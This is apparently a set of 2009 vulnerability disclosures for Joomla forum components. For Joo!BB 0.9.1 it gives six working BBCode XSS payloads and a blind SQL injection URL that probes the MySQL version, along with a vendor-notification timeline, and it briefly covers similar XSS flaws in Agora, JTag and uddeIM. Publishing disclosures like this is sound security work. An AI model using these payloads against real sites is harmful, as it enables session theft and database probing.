The Joomla component Joo!BB 0.9.1 suffers from multiple persistent XSS vulnerabilities in its BBCode implementation, as well as Blind SQL Injection in its search feature.

1. Nested [img] XSS

   [img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]

2. Nested [url] XSS

   [url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]

3. BBCode [color] Tag Injection

   [color=#ff0000;font-size:100px;]XSS[/color]

4. BBCode [url] Location XSS

   [url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]

5. BBCode [font] Tag Injection

   [font=Impact, Compacta, Chicago, sans-serif;color:red;]XSS[/font]

6. BBCode [table] Tag XSS

   [table=border='1' cellspacing='0' cellpadding='0' width='100%'][tr=bgcolor='#ffffff'][td=width='*' onclick='javascript:alert(String.fromCharCode(88,83,83))']XSS[/td][/tr][/table]

7. Blind SQL Injection

   /index.php?tmpl=component&option=com_joobb&view=search&searchwords=%' and SUBSTRING(@@version,1,1)=5 -- '
   If MySQL is version 5, this will return results. Otherwise, no results.

Timeline

• Vulnerabilities Discovered: 26 July 2009
• Vendor Notified: 27 July 2009
• Vendor Response: 29 July 2009
• Update Available: 01 August 2009
• Disclosure: 01 August 2009

The Joomla component Agora 3.0.0 RC1 Rev.4 suffers from a Persistent XSS vulnerability. This can be exploited by uploading a malicious SWF file as an attachment then embedding it using the [swf] BBCode tag from the local server, thus bypassing any crossdomain policy.

Well, another XSS vulnerable BBCode implementation, this time on JTag Ticketing System. This is the exact same vulnerability I posted about earlier concerning WebAmoeba.

The Joomla component uddeIM is vulnerable to XSS injection in its BBCode implementation. Extra CSS parameters can be passed inside the [color] tag, and Internet Explorer versions before 8 will run scripts using the 'expression()' CSS function.